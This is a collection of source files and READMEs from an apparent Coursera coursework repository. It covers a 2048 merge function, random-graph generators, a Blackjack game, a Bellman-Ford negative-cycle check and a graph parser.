"text": "\"\"\"\nMerge function for 2048 game.\n\"\"\"\n\ndef merge(line):\n \"\"\"\n Function that merges a single row or column in 2048.\n \"\"\"\n # create an empty list\n mergelst = []\n \n # put all non-zero values from the list line to begining of mergelst\n for val in list(line):\n if (val != 0):\n mergelst.append(val)\n \n # replace same pairs values with twice it's value\n mergelst2 = [];\n idx = 0\n while idx < (len(mergelst)):\n if (idx < len(mergelst)-1 and mergelst[idx] == mergelst[idx+1]):\n mergelst2.append(2*mergelst[idx])\n idx += 1\n else:\n mergelst2.append(mergelst[idx])\n \n idx +=1\n \n # add zeros at the end of merged list to make the size same as list line \n mergelst2.extend([0]*(len(line)-len(mergelst2)))\n \n return mergelst2\n\n## uncomment the tests below \n## 1- test an empty list. Expected output : Result = []\n#lst = merge([])\n#print \"Result = \", lst\n## 2- test a list of 1 element. Expected output: Result = [4]\n#lst = merge([4])\n#print \"Result = \", lst\n## 3- test lst of size 2 with no pairs.\n## Input : [8,4]. Expected output: Result = [8,4]\n#lst = merge([8,4])\n#print \"Result = \", lst\n## 4- test lst of size 2 with 1 pair.\n## Input : [8,8]. Expected output: Result = [16,0]\n#lst = merge([8,8])\n#print \"Result = \", lst\n## 5- test some combination of lst of size greater than 2 but even size.\n## Input : [2,2,0,0]. Expected output: Result = [4,0,0,0]\n#lst = merge([2,2,0,0])\n#print \"Result = \", lst\n## 6- test some combination of lst of size greater than 2 but odd.\n## Input : [2,2,2]. Expected output: Result = [4,2,0]\n#lst = merge([2,2,2])\n#print \"Result = \", lst\n## 7- test some combination of lst of odd size with set of pairs.\n## Input : [2,2,0,2,2]. Expected output: Result = [4,4,0,0,0]\n#lst = merge([2,2,0,2,2])\n#print \"Result = \", lst\n## 8- test some combination of lst of odd size with no pairs.\n## Input : [2,4,0,2,8]. Expected output: Result = [2,4,2,8,0]\n#lst = merge([2,4,0,2,8])\n#print \"Result = \", lst\n\n\n\n"
},
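The merge above works in two passes (compact the non-zeros, then combine pairs). An equivalent single-pass variant, shown only as a sketch, makes the "each tile merges at most once per move" rule explicit by consuming two tiles whenever a pair combines:

```python
def merge(line):
    """Condensed 2048 merge: slide non-zeros left, combine equal
    adjacent pairs once each, then pad with zeros on the right."""
    tiles = [val for val in line if val != 0]
    merged, idx = [], 0
    while idx < len(tiles):
        if idx + 1 < len(tiles) and tiles[idx] == tiles[idx + 1]:
            merged.append(2 * tiles[idx])
            idx += 2                       # both tiles consumed by the merge
        else:
            merged.append(tiles[idx])
            idx += 1
    return merged + [0] * (len(line) - len(merged))

assert merge([2, 0, 2, 4]) == [4, 4, 0, 0]
assert merge([2, 2, 2]) == [4, 2, 0]       # a tile merges at most once per move
```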
{
"alpha_fraction": 0.6429322361946106,
"alphanum_fraction": 0.6484498381614685,
"avg_line_length": 31.52991485595703,
"blob_id": "2ffc55b80c8715027a6ed5ad3e1a79079cc6261f",
"content_id": "37bbacd1d8fc0918c60af5870e990bfee47f870a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3806,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 117,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_example_graphs.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFuntions to generate 2 types of ugraphs, the undirected ER graph\nand UPA graph\n\"\"\"\nimport random\nimport alg_upa_trial as upa\n\ndef make_complete_graph(num_nodes):\n \"\"\"\n create and return a complete graph with nodes from\n 0 to num_nodes - 1 for num_nodes > 0. Otherwise\n the function returns a dictionary corresponding to\n the empty graph\n\n Arguments:\n num_nodes {integer} -- number of nodes for the graph\n\n Returns:\n dictionary -- returns a dictionary corresponding to a complete directed\n graph with the specified number of nodes.\n \"\"\"\n # local variable for the complete graph\n graph = {}\n\n # return an empty graph if num_nodes is not positive\n if num_nodes <= 0:\n return graph\n\n for node in range(num_nodes):\n # create an adjacency list for a directed complete graph with no\n # self loops or parallel edges\n graph[node] = set([val for val in range(num_nodes) if val != node])\n\n return graph\n\n\ndef alg_er(num_nodes, p):\n \"\"\"\n generate a random graph based on Erdos Renyi(ER) model G(n, p)\n where each edge in the graph is added with probability p\n \n Arguments:\n num_nodes {integer} -- the total number of nodes for the generated graph\n p {float} -- the probability with which to add each edge to the generated graph\n \n Returns:\n dictionary -- return the ER random graph\n \"\"\"\n\n ugraph = {}\n all_edges = []\n\n if (num_nodes <= 0):\n return ugraph\n\n # create a graph of all nodes but no edges\n for node in range(num_nodes):\n ugraph[node] = set()\n\n # find all possible edges of the graph\n all_edges = (set([frozenset([node1, node2]) for node1 in range(num_nodes) \n for node2 in range(num_nodes) if node1 != node2]))\n \n # convert each edge from frozenset to list for indexing\n all_edges = [list(item) for item in all_edges]\n\n # add edges to the graph with probablity p\n for edge in all_edges:\n rand_prob = random.uniform(0,1)\n if rand_prob < p:\n ugraph[edge[0]].add(edge[1])\n ugraph[edge[1]].add(edge[0])\n\n return ugraph\n\ndef alg_upa(n_nodes, m_nodes):\n \"\"\"\n Uses the DPA algorithm provided in Q3 of the Application #1\n to generates a random undirected graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on modified DPA algorithm for undirectef graph\n \"\"\"\n # create a complete graph of m_nodes noes\n upa_graph = make_complete_graph(m_nodes)\n\n # create the UPAtrial object corresponding to complete graph\n upa_trial = upa.UPATrial(m_nodes)\n\n # add each new node to the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the UPATrial class\n for new_node in range(m_nodes, n_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. Remove if any\n # duplicate nodes in the m_nodes selected\n neighbors = upa_trial.run_trial(m_nodes)\n\n # update the existing graph to add this new node and its\n # neighbors\n upa_graph[new_node] = neighbors\n\n # add this new node to all the neighbor nodes since this\n # is a undirected graph\n for neighbor in neighbors:\n upa_graph[neighbor].add(new_node)\n\n return upa_graph\n"
},
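alg_er above materializes every possible edge as a frozenset before sampling, which costs O(n^2) memory up front. A leaner sketch of the same G(n, p) model, iterating the unordered pairs directly with itertools.combinations (the names here are illustrative, not from the repository):

```python
import random
from itertools import combinations

def er_graph(num_nodes, prob):
    """G(n, p): visit each unordered pair exactly once and keep the
    edge with probability prob (same model as alg_er above)."""
    graph = {node: set() for node in range(num_nodes)}
    for node_u, node_v in combinations(range(num_nodes), 2):
        if random.random() < prob:
            graph[node_u].add(node_v)
            graph[node_v].add(node_u)
    return graph

random.seed(0)
sample = er_graph(200, 0.05)
num_edges = sum(len(nbrs) for nbrs in sample.values()) // 2
# expected edge count is prob * n * (n - 1) / 2 = 995 for these parameters
assert 800 < num_edges < 1200
```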
{
"alpha_fraction": 0.5477582812309265,
"alphanum_fraction": 0.5735492706298828,
"avg_line_length": 32.681819915771484,
"blob_id": "2bcb022afa05caa9f79441478ce9001874624189",
"content_id": "8f90d234fc2d106d1331f28b91929653c5956aea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6669,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 198,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project6 Blackjack/BlackJack.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #6 - Blackjack\n\nimport simplegui\nimport random\n\n# load card sprite - 936x384 - source: jfitz.com\nCARD_SIZE = (72, 96)\nCARD_CENTER = (36, 48)\ncard_images = simplegui.load_image(\"http://storage.googleapis.com/codeskulptor-assets/cards_jfitz.png\")\n\nCARD_BACK_SIZE = (72, 96)\nCARD_BACK_CENTER = (36, 48)\ncard_back = simplegui.load_image(\"http://storage.googleapis.com/codeskulptor-assets/card_jfitz_back.png\") \n\nCANVAS_WIDTH = 600\nCANVAS_HEIGHT = 600\n\n# initialize some useful global variables\nin_play = False\noutcome = \"\"\nscore = 0\n\n# define globals for cards\nSUITS = ('C', 'S', 'H', 'D')\nRANKS = ('A', '2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K')\nVALUES = {'A':1, '2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8, '9':9, 'T':10, 'J':10, 'Q':10, 'K':10}\n\n\n# define card class\nclass Card:\n def __init__(self, suit, rank):\n if (suit in SUITS) and (rank in RANKS):\n self.suit = suit\n self.rank = rank\n else:\n self.suit = None\n self.rank = None\n print \"Invalid card: \", suit, rank\n\n def __str__(self):\n return self.suit + self.rank\n\n def get_suit(self):\n return self.suit\n\n def get_rank(self):\n return self.rank\n\n def draw(self, canvas, pos):\n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank), \n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\n canvas.draw_image(card_images, card_loc, CARD_SIZE, [pos[0] + CARD_CENTER[0], pos[1] + CARD_CENTER[1]], CARD_SIZE)\n \n# define hand class\nclass Hand:\n def __init__(self):\n self.listOfCards = [] # create a hand object\n\n def __str__(self):\n s = \"Hand contains: \"\n for card in self.listOfCards:\n s += str(card) + \" \" \n return s\t# return a string representation of a hand\n\n def add_card(self, card):\n self.listOfCards.append(card)\t# add a card object to a hand\n\n def get_value(self):\n # count aces as 1, if the hand has an ace, then add 10 to hand value if it doesn't bust\n hand_value = 0\n ace_present = False\n \n for card in self.listOfCards:\n hand_value += VALUES[card.rank]\n if (card.rank == RANKS[0]):\n ace_present = True\n \n if (ace_present):\n if (hand_value + 10 <= 21):\n hand_value += 10 \n \n return hand_value\n \n def draw(self, canvas, pos):\n i = 0\n for card in self.listOfCards:\n card.draw(canvas, (pos[0] + i * (CARD_SIZE[0]+10), pos[1]))\n i += 1\n\n \n# define deck class \nclass Deck:\n def __init__(self):\n # create a Deck object\n self.deckOfCards = [Card(suit,rank) for suit in SUITS for rank in RANKS]\n \n def shuffle(self):\n # shuffle the deck \n random.shuffle(self.deckOfCards) \n \n def deal_card(self):\n return self.deckOfCards.pop()\t# deal a card object from the deck\n \n def __str__(self):\n s = \"Deck Contains: \"\n for card in self.deckOfCards:\n s += str(card) + \" \" \n return s\t# return a string representation of a hand\n\n#define event handlers for buttons\ndef deal():\n global outcome, in_play, player_hand, dealer_hand, deck, message, score\n \n if (in_play):\n outcome = \"Game forfeited. 
You loose\"\n score -= 1\n in_play = False\n message = \"New Deal?\"\n else: \n deck = Deck() # create the deck object with cards\n deck.shuffle() # shuffle the cards inside the deck\n\n player_hand = Hand() # create a hand for the player\n dealer_hand = Hand() # create a hand for the dealer\n # give two cards to both player and the dealier\n player_hand.add_card(deck.deal_card())\n dealer_hand.add_card(deck.deal_card())\n player_hand.add_card(deck.deal_card())\n dealer_hand.add_card(deck.deal_card())\n \n outcome = \"\"\n message = \"Hit or stand?\" \n in_play = True\n\ndef hit():\n global outcome, in_play, player_hand, deck, score, message\n # if the hand is in play, hit the player\n if (in_play):\n player_hand.add_card(deck.deal_card())\n if (player_hand.get_value() > 21):\n # if busted, assign a message to outcome, update in_play and score\n outcome = \"You have busted!\"\n message = \"New Deal?\"\n in_play = False\n score -= 1 \n \ndef stand():\n global outcome, in_play, player_hand, dealer_hand, deck, score, message\n \n # if hand is in play, repeatedly hit dealer until his hand has value 17 or more\n if(in_play):\n while dealer_hand.get_value() < 17:\n dealer_hand.add_card(deck.deal_card())\n \n if (dealer_hand.get_value() > 21):\n outcome = \"Dealer Busted. You Win\"\n score += 1\n elif (dealer_hand.get_value() >= player_hand.get_value()):\n outcome = \"You Loose\"\n score -= 1\n else:\n outcome = \"You Win\"\n score += 1\n \n in_play = False\n message = \"New Deal?\"\n\n# draw handler \ndef draw(canvas):\n # test to make sure that card.draw works, replace with your code below\n canvas.draw_text(\"Black Jack\", (CANVAS_WIDTH/4, CANVAS_HEIGHT/12), 30, 'cyan')\n \n canvas.draw_text(message, (CANVAS_WIDTH/2 - 50, CANVAS_HEIGHT*3/4 - CARD_SIZE[1]-20), 30, 'Black')\n canvas.draw_text(outcome, (CANVAS_WIDTH/2 - 50, CANVAS_HEIGHT/2 - CARD_SIZE[1]-20), 30, 'Black')\n canvas.draw_text(\"Score \" + str(score), (CANVAS_WIDTH/2+50, CANVAS_HEIGHT/12), 30, 'Black')\n \n canvas.draw_text(\"Dealer\", (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT/2 - CARD_SIZE[1]-20), 30, 'Black')\n dealer_hand.draw(canvas, (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT/2 - CARD_SIZE[1]))\n \n if (in_play):\n canvas.draw_image(card_back, CARD_BACK_CENTER, CARD_BACK_SIZE, (CANVAS_WIDTH/5-CARD_CENTER[0], CANVAS_HEIGHT/2-CARD_CENTER[1]), CARD_BACK_SIZE)\n \n canvas.draw_text(\"Player\", (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT*3/4 - CARD_SIZE[1]-20), 30, 'Black')\n player_hand.draw(canvas, (CANVAS_WIDTH/5 - CARD_SIZE[0], CANVAS_HEIGHT*3/4 - CARD_SIZE[1]))\n \n# initialization frame\nframe = simplegui.create_frame(\"Blackjack\", CANVAS_WIDTH, CANVAS_HEIGHT)\nframe.set_canvas_background(\"Green\")\n\n# create buttons and canvas callback\nframe.add_button(\"Deal\", deal, 200)\nframe.add_button(\"Hit\", hit, 200)\nframe.add_button(\"Stand\", stand, 200)\nframe.set_draw_handler(draw)\n\n# get things rolling\ndeal()\nframe.start()\n"
},
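The ace rule in Hand.get_value above is easy to get wrong, so a standalone sketch of the same rule may help: count every ace as 1, then promote a single ace to 11 only when that does not bust the hand. VALUES follows the record above; hand_value is a hypothetical helper, not part of the mini-project:

```python
VALUES = {'A': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7,
          '8': 8, '9': 9, 'T': 10, 'J': 10, 'Q': 10, 'K': 10}

def hand_value(ranks):
    """Count every ace as 1, then add 10 for one ace if it fits."""
    total = sum(VALUES[rank] for rank in ranks)
    if 'A' in ranks and total + 10 <= 21:
        total += 10
    return total

assert hand_value(['A', 'K']) == 21       # blackjack: the ace counts as 11
assert hand_value(['A', 'A', '9']) == 21  # only one ace can be promoted
assert hand_value(['A', 'K', '5']) == 16  # promoting the ace would bust
```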
{
"alpha_fraction": 0.7464788556098938,
"alphanum_fraction": 0.7887324094772339,
"avg_line_length": 140,
"blob_id": "5e7cd307b73e84c4ac4ed692d53235baead579fb",
"content_id": "721304848979cf93b67ad09ddf5f360422356abb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 1,
"path": "/Algorithms on Graphs/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Algorithms on Graphs by University of California, San Diego & Higher School of Economics on Coursera. Certificate earned on July 22, 2016. \n"
},
{
"alpha_fraction": 0.7687763571739197,
"alphanum_fraction": 0.7780590653419495,
"avg_line_length": 146.625,
"blob_id": "9ff6abd6b398036f3edd4cfa3f28cafc2b6a7073",
"content_id": "66a45fc96b5bc2c57f02c0de37f69009e9af8b88",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 494,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project5 Memory/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #5 - Memory\n\nImplemented a simple version of the classic game, Memory, in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_xFyW39ljbJ_10.py) and press the play button on the top left corner. A window will pop up with a row of 16 cards. The purpose of the game is to find 8 matching pairs of cards in the shortest number of turns indicated on the left of the window.\n\nMini-project overview taken from course page can be found below:\n* Memory is a card game in which the player deals out a set of cards face down. In Memory, a turn (or a move) consists of the player flipping over two cards. If they match, the player leaves them face up. If they don't match, the player flips the cards back face down. The goal of Memory is to end up with all of the cards flipped face up in the minimum number of turns. For this project, we will keep our model for Memory fairly simple. A Memory deck consists of eight pairs of matching cards.\n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-2/supplement/lnYpa/mini-project-description>\n\n\n\n\n"
},
{
"alpha_fraction": 0.5793797373771667,
"alphanum_fraction": 0.598274827003479,
"avg_line_length": 35.4538459777832,
"blob_id": "21c1f2d7a91fdc30f3980871c04f50365b667c26",
"content_id": "89eb9c10c11dd34788aebbeb16afcc8b1c2d8b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4879,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 130,
"path": "/Algorithms on Graphs/Assignment4/negative_cycle.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: negative_cycle.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 2 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with possibly negative edge weights and with n vertices and m \r\n//\t\t\t\tedges, check whether it contains a cycle of negative weight.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. \r\n//\r\n//\t\t\t\tOutput: Output 1 if the graph contains a cycle of negative weight and 0 otherwise.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tnegative_cycle function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.09/2.00 sec, max memory used: 9.9/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <limits>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n/*********************************************************************************\r\n// We use the following lemma to check if negative weight cycle exists in the graph\r\n//\t\t\tlemma: A graph G contains a negative cycle if and only if the nth \r\n//\t\t\t\t (additional) iteration of the Bellman-Ford algorithm updates\r\n//\t\t\t\t some distance values of dist vector above\r\n***********************************************************************************/\r\n\r\n// Uses Bellman-Ford algorithm to find whether a negative cycle exists in the graphs\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e4; edge weights are integers of absolute value at most 10e3\r\n//\t\t(note that m = edges of directed graph adj and n = size of adj)\r\n// POST: return 1 if a negative cycle exists in the graph, 0 otherwise\r\n// PARAM: adj = directed graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n\r\n\r\nint negative_cycle(vector<vector<int> > &adj, vector<vector<int> > &cost) {\r\n\r\n\t// intialize a vector of pairs of int and bool where the first value represents the\r\n\t// current minimum distance to reach that vertice from s and second value stores a bool \r\n\t// that represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\tdist[0].second = true;\r\n\tint i = 0;\r\n\t// Used for determining if the graph has a negative cycle\r\n\tbool flag;\r\n\r\n\t\r\n\t//Run Bellman-Ford Algorithm n times (i.e adj.size() times)\r\n\twhile ( i < adj.size()) {\r\n\r\n\t\r\n\t\tflag = false;\r\n\r\n\t\tfor (vector<int>::size_type u = 0; u < adj.size(); u++) {\r\n\t\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\t\t\t\tif (dist[adj[u][v]].second == false || dist[adj[u][v]].first > dist[u].first + cost[u][v]) {\r\n\r\n\t\t\t\t\tdist[adj[u][v]].second = true;\r\n\t\t\t\t\tdist[adj[u][v]].first = dist[u].first + cost[u][v];\r\n\t\t\t\t\tflag = true;\r\n\t\t\t\t\r\n\r\n\t\t\t\t}\r\n\t\t\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\t//if during ith iteration of the Bellman-Ford algorithm, none of the distance values have been\r\n\t\t//updated, then there will also be no 
change to distance values during i+1 onward iterations and\r\n\t\t//therefore the graph does not contain a negative cycle. Return 0 in this case\r\n\t\tif (flag == false)\r\n\t\t\treturn 0;\r\n\r\n\t\t++i;\r\n\t}\r\n\r\n\t//if after n iterations, the flag is still true, then it means that distance values of some nodes have\r\n\t//been updated and the graph contains negative cycle. Therefore return 1.\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tstd::cout << negative_cycle(adj, cost);\r\n\r\n\t// A test case to check if the negative_cycle function works. These are commented since the \r\n\t// assignment requires the negative_cycle.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\r\n\t//test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tvector<vector<int> > cost1(4, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(-5);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tcost1[4 - 1].push_back(2);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(2);\r\n\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tcost1[3 - 1].push_back(1);\r\n\r\n\tstd::cout << negative_cycle(adj1, cost1)<<std::endl; \r\n\r\n\t***********************************************************************************************/\r\n}\r\n"
},
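The C++ solution above rests on the stated lemma: with all distances initialized to 0 (equivalent to a zero-weight super-source into every vertex), an update still occurring on the n-th Bellman-Ford pass proves a negative cycle. A minimal Python sketch of the same idea, checked against the commented-out test case:

```python
def has_negative_cycle(n, edges):
    """edges is a list of (u, v, w) triples, vertices 0..n-1.
    All distances start at 0, so every component is checked at once."""
    dist = [0] * n
    for _ in range(n):
        updated = False
        for u, v, w in edges:
            if dist[u] + w < dist[v]:
                dist[v] = dist[u] + w
                updated = True
        if not updated:       # converged early: no negative cycle anywhere
            return False
    return True               # still improving on the n-th pass

# The commented test above, 0-indexed: 1->2 (-5), 4->1 (2), 2->3 (2), 3->1 (1)
edges = [(0, 1, -5), (3, 0, 2), (1, 2, 2), (2, 0, 1)]
assert has_negative_cycle(4, edges) is True   # cycle 1 -> 2 -> 3 -> 1 sums to -2
```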
{
"alpha_fraction": 0.6696315407752991,
"alphanum_fraction": 0.6709021329879761,
"avg_line_length": 33.977779388427734,
"blob_id": "61870c749eed86008e2d0db0d5e9ad51de61f9c6",
"content_id": "a24e49c0915c357e57a4f6a5935f246f642c35ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1574,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_dpa.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAlgorithm to generate DPA graph \n\"\"\"\nimport deg_dis_for_graphs as deg_funcs\nimport alg_dpa_trial as dpa\n\ndef alg_dpa(n_nodes, m_nodes):\n \"\"\"\n Uses the DPA algorithm provided in Q3 of the Application\n to generates a random directed graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on DPA algorithm\n \"\"\"\n\n # create a complete graph of m_nodes noes\n dpa_graph = deg_funcs.make_complete_graph(m_nodes)\n\n # create the DPA trial object corresponding to complete graph\n dpa_trial = dpa.DPATrial(m_nodes)\n\n # add each new ode to m_nodes from the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the DPATrial class\n for new_node in range(m_nodes, n_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. Remove if any\n # duplicate nodes in the m_nodes selected\n neighbors = dpa_trial.run_trial(m_nodes)\n\n # update the existing graph to add this new node and its\n # neighbors\n dpa_graph[new_node] = neighbors\n\n\n return dpa_graph\n"
},
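DPATrial.run_trial is only referenced above, not shown. As an assumption-laden sketch of what one such trial does, here is a static weighted selection where node i is picked with probability (in_degree[i] + 1) / (sum of in-degrees + n), matching the formula quoted in the comments; the real provided class also updates its internal counts between trials, which this version deliberately omits:

```python
import random

def run_trial_static(in_degrees, num_choices):
    """One preferential-attachment trial over fixed in-degrees;
    duplicates collapse because the result is returned as a set."""
    weights = [deg + 1 for deg in in_degrees]
    total = float(sum(weights))          # = sum(in-degrees) + n
    chosen = set()
    for _ in range(num_choices):
        threshold, acc = random.uniform(0, total), 0.0
        for node, weight in enumerate(weights):
            acc += weight
            if threshold <= acc:
                chosen.add(node)
                break
    return chosen

random.seed(1)
# three existing nodes with in-degrees 5, 1, 0: node 0 should dominate picks
picks = [run_trial_static([5, 1, 0], 1) for _ in range(100)]
assert all(pick <= {0, 1, 2} for pick in picks)
```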
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.7839622497558594,
"avg_line_length": 131.25,
"blob_id": "64fdb6b480985ff45df4ec2c5b796e08e6afea1a",
"content_id": "d7faf84d1630ffa661e801a2ed479dd702fd30d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1060,
"license_type": "no_license",
"max_line_length": 549,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project3 Stopwatch The Game/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 - \"StopWatch: The Game\"\n\nImplemented the game that using Timers in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_Kwifo40s54_7.py) and press the play button on the top left corner. A pop up window will appear and allow you start, stop, or reset the timer. The goal of the game is to stop the timer on a whole number. The number of correctly stopped timer attempts vs. the total number of attempts to stop the timer on whole number are printed on the top right corner of the window.\n\nMini-project overview taken from course page can be found below:\n* Our mini-project for this week will focus on combining text drawing in the canvas with timers to build a simple digital stopwatch that keeps track of the time in tenths of a second. The stopwatch should contain \"Start\", \"Stop\" and \"Reset\" buttons. \n\nComplete Mini-Project Description can be found at: <https://www.coursera.org/learn/interactive-python-1/supplement/MoH55/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.6298292875289917,
"alphanum_fraction": 0.6352201104164124,
"avg_line_length": 33.8125,
"blob_id": "768aeeaa820ad24a2a3bd8d61c8b5cef273699e1",
"content_id": "89f0e3dee0eae989e9118df0c0b4f106d6bb5807",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/parse_graph.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCommon functions used for the both Application #1 and #2\n\"\"\"\n\ndef load_graph(graph_file):\n \"\"\"\n Helper function to solve Q1 Application #1: Analysis of\n Citation Graphs\n converts the text representation of a graph from\n a text file to dictionary representation. \n \n Arguments:\n graph_file {string} -- a file name of the file with text representation of a graph\n \n Returns:\n dictionary -- returns a dictionary representation of the graph\n \"\"\"\n # will store the dictionary representation of the graph\n graph = {}\n\n with open(graph_file) as grh_file:\n for line in grh_file:\n # get the tail node and corresponding head nodes in the current\n # line of the adjacency list text representation of graph\n nodes = line.split()\n # convert the head node string to integer\n head_nodes = map(int, nodes[1:])\n # add the key, the tail node, and value, the head nodes to the\n # dictionary representation of the graph\n graph[int(nodes[0])] = set(head_nodes)\n \n return graph"
},
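A quick hypothetical round trip for load_graph above: write a three-node adjacency list in the expected "tail head head ..." text format and parse it back (tiny_graph.txt is a throwaway name used only for this check):

```python
# assumes load_graph from the parse_graph module above is importable
with open("tiny_graph.txt", "w") as handle:
    handle.write("0 1 2\n1 2\n2\n")   # node 0 -> {1, 2}, node 1 -> {2}, node 2 -> {}

graph = load_graph("tiny_graph.txt")
assert graph == {0: set([1, 2]), 1: set([2]), 2: set()}
```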
{
"alpha_fraction": 0.7231942415237427,
"alphanum_fraction": 0.7323848009109497,
"avg_line_length": 45.92971420288086,
"blob_id": "c64b4b07f745180d60bc40911236cc04d59d6182",
"content_id": "28c3f9e2217688f8742893150830411a22171181",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14689,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 313,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 2/alg_application2_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
